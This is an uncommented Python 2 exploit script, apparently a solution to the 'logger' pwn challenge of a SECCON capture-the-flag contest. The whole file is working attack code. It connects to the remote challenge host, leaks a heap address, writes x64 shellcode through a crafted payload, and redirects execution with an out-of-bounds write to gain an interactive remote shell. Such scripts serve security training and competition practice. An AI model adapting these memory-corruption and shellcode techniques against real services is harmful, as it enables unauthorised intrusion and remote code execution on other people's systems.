import phun
import string
import random
def fill_file(n,p,addr):
    r = phun.Remote('logger.pwn.seccon.jp',6565)
    r.read('exit\n')
    r.sendline('1')
    r.read(':')
    r.sendline(n)
    r.read(':')
    r.sendline(p)
    r.read('exit\n')
    r.sendline('2')
    r.read(':')
    r.sendline(str(64))
    payload = phun.p64(addr) *3 + "\xff" * 8 + phun.sh('x64')
    r.write(payload)
        
    r.read('exit\n')
    r.sendline('4')
    
#r = phun.Remote('localhost',1234)
r = phun.Remote('logger.pwn.seccon.jp',6565)
n = ''.join((random.choice(string.ascii_lowercase) for i in range(58)))
p = ''.join((random.choice(string.ascii_lowercase) for i in range(58)))

r.read('exit\n')
r.sendline('1')
r.read(':')
r.sendline(n)
r.read(':')
r.sendline(p)
r.read('exit\n')
r.sendline('3')
r.read('filename: ')
r.read(32)

heap = phun.u64(r.read('=')[:-1]) & ~0xfff
print '[+] heap', hex(heap)
r.read('exit\n')
print '[*] shellcode', hex(heap + 0x250 + 32)
fill_file(n,p,heap + 0x250 + 32)

r.sendline('1')
r.read('exit\n')
r.sendline('2')
r.read(':')
r.sendline(str(0x602028 - (heap + 0x270)))
r.read('exit\n')
#raw_input('a')
r.sendline('1')
r.read(64)
r.shell()

r.sendline('4')